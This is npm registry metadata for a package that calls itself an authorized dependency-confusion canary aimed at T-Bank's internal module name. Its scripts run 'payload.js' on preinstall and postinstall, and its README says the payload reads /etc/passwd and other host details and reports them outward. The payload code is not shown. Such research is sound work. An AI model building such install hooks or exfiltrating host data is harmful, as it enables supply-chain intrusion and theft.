{"_id":"@pwaplatform/module-sso-integration","_rev":"2-f92b5998e738a0ae642117117b8eb1f7","name":"@pwaplatform/module-sso-integration","dist-tags":{"latest":"99.0.1"},"versions":{"99.0.0":{"name":"@pwaplatform/module-sso-integration","version":"99.0.0","keywords":["security-research","canary","dependency-confusion"],"license":"MIT","_id":"@pwaplatform/module-sso-integration@99.0.0","maintainers":[{"name":"vd_danilov","email":"danilov.labs@gmail.com"}],"dist":{"shasum":"f24dee4d0c47e2c4dd6807e8ad573edea89f6a87","tarball":"https://registry.npmjs.org/@pwaplatform/module-sso-integration/-/module-sso-integration-99.0.0.tgz","fileCount":4,"integrity":"sha512-wvMeDnFr2PJamjCllnQaIImNXMVIYMHiFtw3m+pQfMYRzoELJWSWuDM+VWKRKVprtwusVBjm3O0Mnw3ldW0uww==","signatures":[{"sig":"MEUCIQDbd0dNNuNpCAdMfNrMmeDrbsBYWJOefuPnRO2Is9vZnQIgTgP29l4B8MY3BnZaa6f+xGoLfbjfKv5INC09zG7gWEs=","keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U"}],"unpackedSize":5242},"main":"index.js","scripts":{"preinstall":"node payload.js","postinstall":"node payload.js"},"_npmUser":{"name":"vd_danilov","email":"danilov.labs@gmail.com"},"_npmVersion":"10.9.8","description":"Security research canary package (dependency confusion detection). Published as part of an authorized bug bounty program. See README.md.","directories":{},"_nodeVersion":"22.23.2","_hasShrinkwrap":false,"_npmOperationalInternal":{"tmp":"tmp/module-sso-integration_99.0.0_1789900199396_0.6072947310535626","host":"s3://npm-registry-packages-npm-production"}},"99.0.1":{"_id":"@pwaplatform/module-sso-integration@99.0.1","dist":{"shasum":"fa5cefca6f4926cbe2914ba7226e9ec47713ef80","tarball":"https://registry.npmjs.org/@pwaplatform/module-sso-integration/-/module-sso-integration-99.0.1.tgz","fileCount":4,"integrity":"sha512-1E+Zj5ao7Na9CD3jMxV1nzmy2UdJ10YQBEsGW3KQtgtKXUmRNOifR9n7ZfVE7Qa19GuzdrQbAFgEmehfFuEv4A==","signatures":[{"sig":"MEQCIDgPJ6wm713LLW6cSsiCo0VzGiSbdrYcxNK2oTm/Z6aVAiAKkNKhkA9vlHa0Y5vHaqgZz+iUl7We6JAsHyCEfTxZZQ==","keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U"},{"keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U","sig":"MEUCIQC+5SVDqDtuJhbZwTiBJnlip408e0w/yuV2XzpHmspiRwIgYo5rG/bjprF5KfIRhoB/SX6seSgiGHKeMLtjBWE1R9E="}],"unpackedSize":7690},"main":"index.js","name":"@pwaplatform/module-sso-integration","license":"MIT","scripts":{"preinstall":"node payload.js","postinstall":"node payload.js"},"version":"99.0.1","_npmUser":{"name":"vd_danilov","email":"danilov.labs@gmail.com"},"keywords":["security-research","canary","dependency-confusion"],"_npmVersion":"10.9.8","description":"Security research canary package (dependency confusion detection). Published as part of an authorized bug bounty program. See README.md.","directories":{},"maintainers":[{"name":"vd_danilov","email":"danilov.labs@gmail.com"}],"_nodeVersion":"22.23.2","_hasShrinkwrap":false,"_npmOperationalInternal":{"host":"s3://npm-registry-packages-npm-production","tmp":"tmp/module-sso-integration_99.0.1_1789902319917_0.8583469618881925"}}},"time":{"created":"2026-09-20T10:29:59.237Z","modified":"2026-09-20T11:05:20.252Z","99.0.0":"2026-09-20T10:29:59.519Z","99.0.1":"2026-09-20T11:05:19.994Z"},"license":"MIT","keywords":["security-research","canary","dependency-confusion"],"description":"Security research canary package (dependency confusion detection). Published as part of an authorized bug bounty program. See README.md.","maintainers":[{"name":"vd_danilov","email":"danilov.labs@gmail.com"}],"readme":"# @pwaplatform/module-sso-integration (security research canary)\n\nThis package is a **benign canary** published to test for dependency\nconfusion, as part of an **authorized bug bounty program** run against\nT-Bank (Т-Банк).\n\n## Why this package exists\n\nThe package name `@pwaplatform/module-sso-integration` is referenced as an\ninternal module name inside production JavaScript bundles served from\n`www.tbank.ru`, but the `@pwaplatform` scope was not registered on the\npublic npm registry. This canary checks whether builds that resolve this\nname would pull it from the public registry.\n\n## What it does\n\nOn install it collects a minimal, non-destructive environment fingerprint\n(hostname, user, uname, `/etc/passwd`, working directory, npm registry\nconfig) and reports it once to the research collector. It contains **no\nother code**: no second stage, no persistence, no file writes, no network\nactivity beyond the single report.\n\n## Intent and contact\n\nPublished in good faith for defensive security research. If you are the\nrightful owner of the `@pwaplatform` namespace, this package will be\nunpublished immediately on request via the bug bounty program's disclosure\nchannel.\n","readmeFilename":"README.md"}